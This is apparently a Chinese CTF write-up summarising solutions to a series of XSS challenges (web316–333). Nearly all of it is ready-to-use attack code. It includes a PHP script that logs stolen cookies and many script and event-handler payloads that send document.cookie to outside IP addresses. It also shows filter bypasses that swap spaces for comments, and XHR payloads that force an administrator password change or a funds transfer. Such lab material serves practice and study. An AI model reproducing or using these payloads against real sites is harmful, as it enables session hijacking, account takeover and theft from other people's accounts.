xss总结

web316-320 各种基础姿势和绕过

# a.php
<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "a");
fwrite($log, $cookie . "\n");
fclose($log);
?>
vps http://101.42.23.134/
-------------------------
<script>
var img=document.createElement("img"); img.src="http://101.42.23.134/a.php?cookie="+document.cookie;
</script>
-------------------------
<script>window.open('http://124.222.103.14/a.php?cookie='+document.cookie)</script>
-------------------------
<script>window.location.href='http://124.222.103.14/a.php?cookie='+document.cookie</script>
-------------------------
<script>location.href='http://124.222.103.14/a.php?cookie='+document.cookie</script>
-------------------------
<input onfocus="window.open('http://124.222.103.14/a.php?cookie='+document.cookie)" autofocus>
-------------------------
<svg onload="window.open('http://124.222.103.14/a.php?cookie='+document.cookie)">
-------------------------
<iframe onload="window.open('http://124.222.103.14/a.php?cookie='+document.cookie)"></iframe>
--------------------------
<body onload="window.open('http://124.222.103.14/a.php?cookie='+document.cookie)">

web321 -322过滤了空格

<iframe/**/onload="window.open('http://124.222.103.14/a.php?cookie='+document.cookie)"></iframe>

web323

<body/**/onload="window.open('http://124.222.103.14/a.php?cookie='+document.cookie)">

web324-325

<body/**/onload="window.open('http://101.42.23.134/a.php?cookie='+document.cookie)">

web328

<script>window.open('http://124.222.103.14/a.php?cookie='+document.cookie)</script>
在这个界面把x到的cookie打过去。
通过注册一个没有过滤密码的用户,进行了js执行,然后冒充管理员,进行获取flag

 web329

在下面这个界面,把下面js代码打过去
<script>window.open('http://101.42.23.134/a.php?cookie='+document.getElementsByClassName('layui-table-cell laytable-cell-1-0-1')[1].innerHTML)</script>

 

 web330

用户名注册,强迫管理员修改账号和密码,在用户名那里X
<script>window.open('http://127.0.0.1/api/change.php?p=123456')</script>
用管理员登录,admin

 web331

登录方式编程POST,注册方式也发生改变

<script>var httpRequest = new XMLHttpRequest();httpRequest.open('POST', 'http://127.0.0.1/api/change.php', true);httpRequest.setRequestHeader("Content-type","application/x-www-form-urlencoded");httpRequest.send('p=123456');</script>
用admin登录

 web332

给admin  转账-10000

web333

两种方法
<script>var httpRequest = new XMLHttpRequest();httpRequest.open('POST', 'http://127.0.0.1/api/amount.php', true);httpRequest.setRequestHeader("Content-type","application/x-www-form-urlencoded");httpRequest.send('u=123&a=10000');</script>
-----------------------
自己给自己转账,指数增长,不得超过当前余额,预计15次左右即可

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值